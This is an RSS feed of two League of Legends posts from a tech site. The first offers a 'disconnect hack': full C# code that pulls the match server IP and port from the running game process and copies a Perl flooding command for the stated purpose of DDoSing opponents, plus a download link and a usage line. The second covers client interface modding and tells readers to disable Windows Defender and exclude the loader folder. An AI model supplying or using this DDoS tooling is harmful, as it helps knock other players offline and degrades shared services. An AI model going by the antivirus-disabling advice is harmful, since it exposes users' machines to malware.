<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>LOL &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/lol/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Wed, 01 Feb 2023 21:24:23 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>LOL &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Instructions for creating a disconect hack tool LoL</title>
		<link>https://en.anonyviet.com/instructions-for-creating-a-disconect-hack-tool-lol/</link>
					<comments>https://en.anonyviet.com/instructions-for-creating-a-disconect-hack-tool-lol/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 21:24:23 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[creating]]></category>
		<category><![CDATA[disconect]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Instructions]]></category>
		<category><![CDATA[LOL]]></category>
		<category><![CDATA[tool]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=8089</guid>

					<description><![CDATA[This is a tool to disconnect Lol by detecting the opponent&#8217;s IP and then DDOS, the link tool is at the end of the article Join the channel Telegram of the AnonyViet 👉 Link 👈 Here is the code if you want to create your own file Visual Studio is required first to package C# [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>This is a tool to disconnect Lol by detecting the opponent&#8217;s IP and then DDOS, the link tool is at the end of the article</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Here is the code if you want to create your own file</p>
<p>Visual Studio is required first to package C# application<br />Code tool Find the IP of the match as follows:</p>
</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter" src="https://i.ytimg.com/vi/3dNFXJe5lSM/hqdefault.jpg" alt="Instructions for creating a tool to hack disconect LoL 4" width="480" height="360" title="Instructions for creating a hacking tool disconect LoL 6"/></p>
<pre class="lang:c# decode:true">using System;&#13;
using System.Collections.Generic;&#13;
using System.Management;&#13;
using System.Text.RegularExpressions;&#13;
using System.Windows.Forms;&#13;
&#13;
namespace League_IP&#13;
{&#13;
  internal class Lolip&#13;
  {&#13;
    [STAThread]&#13;
    private static void Main(string[] args)&#13;
    {&#13;
      List&lt;string&gt; list = new Lolip().wmi_process();&#13;
      if (list.Count &lt; 1)&#13;
        return;&#13;
      Console.WriteLine("LOLIP - Modified by HackerPro536 - HVNGroups.Net");&#13;
      Console.WriteLine("\nIP: " + list[0]);&#13;
      Console.WriteLine("Port: " + list[1]);&#13;
      Clipboard.SetText("perl hvn.pl " + list[0] + " " + list[1] + " 1024 600");&#13;
      Console.ReadLine();&#13;
    }&#13;
&#13;
    private List&lt;string&gt; wmi_process()&#13;
    {&#13;
      string input = "";&#13;
      List&lt;string&gt; list1 = new List&lt;string&gt;();&#13;
      try&#13;
      {&#13;
        foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Process WHERE Caption = 'League of Legends.exe'").Get())&#13;
          input = managementBaseObject["CommandLine"].ToString();&#13;
      }&#13;
      catch (ManagementException ex)&#13;
      {&#13;
        Console.WriteLine("An error occurred while querying for WMI data: " + ex.Message);&#13;
      }&#13;
      if (input.Length &lt;= 1)&#13;
        return list1;&#13;
      string pattern = "\"";&#13;
      IList&lt;int&gt; list2 = (IList&lt;int&gt;) new List&lt;int&gt;();&#13;
      foreach (Match match in Regex.Matches(input, pattern))&#13;
        list2.Add(match.Index);&#13;
      int num = list2[list2.Count - 2];&#13;
      string str1 = input.Substring(num + 1);&#13;
      string str2 = str1.Substring(0, str1.IndexOf(' ') + 1);&#13;
      string str3 = str1.Substring(str2.Length, 4);&#13;
      string str4 = str2.Trim();&#13;
      string str5 = str3.Trim();&#13;
      list1.Add(str4);&#13;
      list1.Add(str5);&#13;
      return list1;&#13;
    }&#13;
  }&#13;
}</pre>
<p>After packaging will be the following application:</p>
<p><span style="color: #ff0000;"><strong><em>Download here:</em></strong> </span><strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1T72ll" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">>>>Download<<<</a></strong></p>
<p>After having the program Find the match IP, then use perl ddos ​​or ddos ​​on VPS, koding whatever you like:<br />The code is as follows:</p>
<blockquote>
<pre class="lang:default decode:true">perl lol.pl IP Port Time request&#13;
</pre>
</blockquote>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;385&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/instructions-for-creating-a-disconect-hack-tool-lol/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/hack_drop.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to edit the Client interface LOL (by A1tina)</title>
		<link>https://en.anonyviet.com/how-to-edit-the-client-interface-lol-by-a1tina/</link>
					<comments>https://en.anonyviet.com/how-to-edit-the-client-interface-lol-by-a1tina/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 09 Jan 2023 14:16:20 +0000</pubDate>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[A1tina]]></category>
		<category><![CDATA[Client]]></category>
		<category><![CDATA[edit]]></category>
		<category><![CDATA[interface]]></category>
		<category><![CDATA[LOL]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=644</guid>

					<description><![CDATA[This is how to edit the interface of the Client Game application League of Legends your 四 宮 shared on Group J2Team. You can contact the author of this guide via some of the following methods: Join the channel Telegram of the AnonyViet 👉 Link 👈 Discord: Altina#9999 Facebook: I temporarily stopped receiving contact via [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p><span style="font-weight: 400;">This is how to edit the interface of the Client Game application <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F%3Fs%3Dlol" rel="noopener" class="local-link">League of Legends</a> your <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.facebook.com%2FHaibaraAi0105" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">四 宮</a> shared on <strong>Group J2Team</strong>.  You can contact the author of this guide via</span><span style="font-weight: 400;"> some of the following methods:</span></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>Discord</b><span style="font-weight: 400;">:</span> <span style="font-weight: 400;">Altina#9999</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Facebook</b><span style="font-weight: 400;">: I temporarily stopped receiving contact via Facebook, hope everyone understands (January 9, 2023)</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Ingame LOL</b><span style="font-weight: 400;">: </span><span style="font-weight: 400;">glitter</span></li>
</ul>
<h2 id="ftoc-luu-y-truoc-khi-thuc-hien" class="ftwp-heading">Note before doing:</h2>
<p>Before implementing the League of Legends Client Interface Mod you need to turn off Windows Defender before downloading and extracting the file because otherwise WD will delete the .exe file because this is a system intervention program and WD identifies as a threat. harmful.</p>
<p><span style="font-weight: 400;">So please turn off WD before loading and unpacking League Loader.  Also, before turning it back on, everyone press <strong>Windows+ I</strong> -> <strong>Update &#038; Recovery -></strong> <strong>Virus &#038; threat protection.</strong></span></p>
<p><span style="font-weight: 400;">Under section <strong>Virus &#038; threat protection settings</strong>select <strong>Manage settings</strong>scroll down a bit and press <strong>Add or remove exclusions</strong> same picture.</span></p>
<p><span style="font-weight: 400;">Then add the folder path containing the file <strong>LeagueLoader.exe</strong> so that when WD is back on, it won&#8217;t scan to that folder and delete the .exe file anymore</span></p>
<p><img decoding="async" class="aligncenter size-full wp-image-44723" src="https://anonyviet.com/wp-content/uploads/2023/01/chinh-sua-giao-dien-lol-client.jpg" alt="edit interface lol client" width="531" height="297" srcset="https://anonyviet.com/wp-content/uploads/2023/01/chinh-sua-giao-dien-lol-client.jpg 531w, https://anonyviet.com/wp-content/uploads/2023/01/chinh-sua-giao-dien-lol-client-300x168.jpg 300w" sizes="(max-width: 531px) 100vw, 531px" title="How to edit the Client interface LOL (by A1tina) 15"/></p>
<p><span style="font-weight: 400;">Let&#8217;s edit the CLIENT LOL . interface </span></p>
<h2 id="ftoc-cong-doan-chuan-bi" class="ftwp-heading"><b>Preparation stage: </b></h2>
<p style="text-align: center;"><strong>Download App League Loader: <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fnomi-san%2Fleague-loader%2Freleases%2Fdownload%2F0.3b%2Fleague-loader-0.3b.zip" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Release league-loader-0.3b · nomi-san/league-loader (github.com)</a></strong></p>
<p style="text-align: center;"><strong>Download 1 .js file and 1 .css file yourself to this Drive: <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.fshare.vn%2Ffile%2FNTTE8NCI8DW5" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">mod client lol</a> | <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fdrive.google.com%2Fdrive%2Fu%2F2%2Ffolders%2F12S-8C2wQhTy3ycudWZDVgFEpHo1UwCQh" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Backup</a></strong></p>
<h2 id="ftoc-cach-chinh-sua-giao-dien-client-lol" class="ftwp-heading"><b>How to edit the Client interface LOL</b></h2>
<p><span style="font-weight: 400;">Download and extract the League Loader app, then run the League Loader.exe file.  At the interface of the app, at the level of League Client path, people point the path to the folder containing the file </span><b>LeagueClient.exe</b><span style="font-weight: 400;">  (Client file of LOL).  Normally the default will be C:\Riot Games\League of Legends. </span><span style="font-weight: 400;"> After pointing the path, press </span><b>Install</b><span style="font-weight: 400;">  to install the app on the client</span><span style="font-weight: 400;">.  Now open the client LOL will show Dev Tool (F12)</span></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-44724" src="https://anonyviet.com/wp-content/uploads/2023/01/tai-League-Loader-mod-giao-dien-lol.png" alt="League Loader mod interface lol" width="348" height="219" srcset="https://anonyviet.com/wp-content/uploads/2023/01/tai-League-Loader-mod-giao-dien-lol.png 348w, https://anonyviet.com/wp-content/uploads/2023/01/tai-League-Loader-mod-giao-dien-lol-300x189.png 300w" sizes="auto, (max-width: 348px) 100vw, 348px" title="How to edit Client interface LOL (by A1tina) 16"/></p>
<p><span style="font-weight: 400;">Copy files </span><b>a1tina.js</b><span style="font-weight: 400;">  and paste it into the plugins folder of the League Loader app.  At this step, people can open the game client, then select the Setting icon (the cogwheel), you will see the Reload theme button.  Click on it and the LOL client interface will now look like the image below. </span></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-44725" src="https://anonyviet.com/wp-content/uploads/2023/01/chinh-sua-giao-dien-clien-lien-minh-huyen-thoai.jpg" alt="edit the interface of the phone alliance" width="860" height="595" srcset="https://anonyviet.com/wp-content/uploads/2023/01/chinh-sua-giao-dien-clien-lien-minh-huyen-thoai.jpg 860w, https://anonyviet.com/wp-content/uploads/2023/01/chinh-sua-giao-dien-clien-lien-minh-huyen-thoai-300x208.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/01/chinh-sua-giao-dien-clien-lien-minh-huyen-thoai-768x531.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/01/chinh-sua-giao-dien-clien-lien-minh-huyen-thoai-750x519.jpg 750w" sizes="auto, (max-width: 860px) 100vw, 860px" title="How to edit Client interface LOL (by A1tina) 17"/></p>
<p><span style="font-weight: 400;">So how to customize the client to your liking?  File </span><b>a1tina.css</b><span style="font-weight: 400;">  the author&#8217;s will support that. </span><span style="font-weight: 400;">At this step, everyone needs to prepare more:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Discord (web or app versions are fine)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">A background that you want to resize to 1920×1080 or more to replace the client&#8217;s default background. </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">1 background sidebar size </span><b>exactly</b><span style="font-weight: 400;">  is 225×720 to change the background of the friends list.  People can use Paint or Photoshop to crop the image and get the desired frame in that 225×720 size. </span></li>
</ul>
<h3 id="ftoc-bat-dau-thuc-hien" class="ftwp-heading"><b>Start making:</b></h3>
<p><span style="font-weight: 400;"><strong>Step 1:</strong> Upload 2 backgrounds to Discord by sending pictures to a certain server, or create a server and upload photos (introverts like me >///<) then copy the links of both backgrounds, paste them in Notepad and leave there. </span></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-44726" src="https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol.jpg" alt="client interface mod lol" width="616" height="611" srcset="https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol.jpg 616w, https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol-300x298.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol-150x150.jpg 150w, https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol-75x75.jpg 75w" sizes="auto, (max-width: 616px) 100vw, 616px" title="How to edit Client interface LOL (by A1tina) 18"/></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-44727" src="https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol-2.jpg" alt="mod interface client lol 2" width="843" height="441" srcset="https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol-2.jpg 843w, https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol-2-300x157.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol-2-768x402.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/01/mod-giao-dien-client-lol-2-750x392.jpg 750w" sizes="auto, (max-width: 843px) 100vw, 843px" title="How to edit the Client interface LOL (by A1tina) 19"/></p>
<p><span style="font-weight: 400;"><strong>Step 2:</strong> Open file <strong>a1tina.css</strong> up, I have noted quite carefully in that file the positions that people can edit.  I just need to change the background link in my file to the background link I just copied from Discord. </span></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-44729" src="https://anonyviet.com/wp-content/uploads/2023/01/sua-file-a1tina.css-1.jpg" alt="sua file a1tina.css" width="1100" height="266" srcset="https://anonyviet.com/wp-content/uploads/2023/01/sua-file-a1tina.css-1.jpg 1100w, https://anonyviet.com/wp-content/uploads/2023/01/sua-file-a1tina.css-1-300x73.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/01/sua-file-a1tina.css-1-1024x248.jpg 1024w, https://anonyviet.com/wp-content/uploads/2023/01/sua-file-a1tina.css-1-768x186.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/01/sua-file-a1tina.css-1-750x181.jpg 750w" sizes="auto, (max-width: 1100px) 100vw, 1100px" title="How to edit Client interface LOL (by A1tina) 20"/></p>
<p>Continue to scroll down to adjust:</p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-44730 size-full" src="https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-18-27-1.jpg" alt="Open the file a1tina.css" width="1067" height="531" srcset="https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-18-27-1.jpg 1067w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-18-27-1-300x149.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-18-27-1-1024x510.jpg 1024w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-18-27-1-768x382.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-18-27-1-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-18-27-1-750x373.jpg 750w" sizes="auto, (max-width: 1067px) 100vw, 1067px" title="How to edit Client interface LOL (by A1tina) 21"/></p>
<p><span style="font-weight: 400;">Some icon links to change the icon to display RP, THL, etc. I all noted in the file a1tina.css, to change them, everyone also upload their desired icon to Discord and then take the image link and paste it in the correct position. It&#8217;s fine to apply in the .css file.  The icon size is optional, but it is recommended to be as small as 100×100. </span></p>
<p><span style="font-weight: 400;">Now need to Upload 2 files .css and .js up to call down the app.</span></p>
<p><span style="font-weight: 400;"> At this final stage, people visit the website </span><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fstaticsave.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"><span style="font-weight: 400;">Host Static files online for Free – StaticSave</span></a><span style="font-weight: 400;">is a place to host .js, .css, .html… files for free. </span><span style="font-weight: 400;">Click <strong>Get Started</strong> and create a new profile using gmail.  Next, create a new folder with any name (as long as the folder name does not match the folders that ngta created before)</span></p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-44731 size-full" src="https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-20-18.png" alt="Host Static files online for Free - StaticSave" width="675" height="309" srcset="https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-20-18.png 675w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-20-18-300x137.png 300w" sizes="auto, (max-width: 675px) 100vw, 675px" title="How to edit Client interface LOL (by A1tina) 22"/></p>
<p><span style="font-weight: 400;">After creating the folder, proceed to create a new .css file with any name.  I assume this file is named a.css. </span></p>
<p><span style="font-weight: 400;">You will see your a.css file with the following address: </span></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fstatic.staticsave.com%2Ffolder1%2Fa.css" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"><span style="font-weight: 400;">https://static.staticsave.com/folder1/a.css</span></a></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-44732" src="https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-21-01.png" alt="How to edit the Client interface LOL (by A1tina) 2" width="720" height="405" srcset="https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-21-01.png 720w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-21-01-300x169.png 300w" sizes="auto, (max-width: 720px) 100vw, 720px" title="How to edit Client interface LOL (by A1tina) 23"/></p>
<p><span style="font-weight: 400;">Everyone save the address of the .css file that everyone has created.  Its address is located at the beginning of the file name (as shown above).</span></p>
<p><span style="font-weight: 400;">Next, go back to the a1tina.js file in the plugins folder of the League Loader app that you just pasted in.  Open that file with Notepad and edit it as shown below:</span></p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-44733 size-full" src="https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-21-30-1.jpg" alt="tweak the client interface lol" width="1050" height="616" srcset="https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-21-30-1.jpg 1050w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-21-30-1-300x176.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-21-30-1-1024x601.jpg 1024w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-21-30-1-768x451.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/01/09-01-2023-06-21-30-1-750x440.jpg 750w" sizes="auto, (max-width: 1050px) 100vw, 1050px" title="How to edit Client interface LOL (by A1tina) 24"/></p>
<p><span style="font-weight: 400;">That&#8217;s all the steps are done, Now open the game client, select <strong>Settings -> Reload</strong> Theme and enjoy the result.</span></p>
<p><span style="font-weight: 400;">If you&#8217;ve followed the steps and still don&#8217;t show results, re-read them carefully to see if anyone missed a step.  If there is an error, please respond to the author via the contact methods at the top of the article.</span></p>
<p style="text-align: right;">Link to original article: https://docs.google.com/document/d/19QwuCpfIcgd5peIPlNAWHtkrtTR5mRkkNgFgt1kmWZ4/edit?fbclid=IwAR2VKjmQrzY3TgJCU_CHxUFmfO__HuOA9uRqIzWh4Yl-9Ps4</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;44722&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (1 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (1 vote)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-edit-the-client-interface-lol-by-a1tina/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2023/01/doi-giao-dien-client-lien-minh.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
